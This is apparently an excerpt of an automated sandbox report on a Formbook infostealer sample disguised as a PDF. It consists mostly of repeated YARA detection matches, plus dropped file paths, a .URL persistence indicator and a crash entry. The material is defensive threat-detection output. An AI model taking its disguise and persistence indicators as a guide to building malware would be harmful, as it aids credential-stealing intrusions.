Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DOC209272621615.PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 6.2.Wkklnmcz.exe.2666268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0.0.DOC209272621615.PDF.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.DOC209272621615.PDF.exe.2686268.5.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 6.2.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 6.0.Wkklnmcz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.Wkklnmcz.exe.2746268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DOC209272621615.PDF.exe.2686268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.DOC209272621615.PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Contacts\zcmnlkkW.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\Contacts\Wkklnmcz.exe, type: DROPPED	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =

One or more processes crash

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 2132

Detected potential crypto function

Show sources

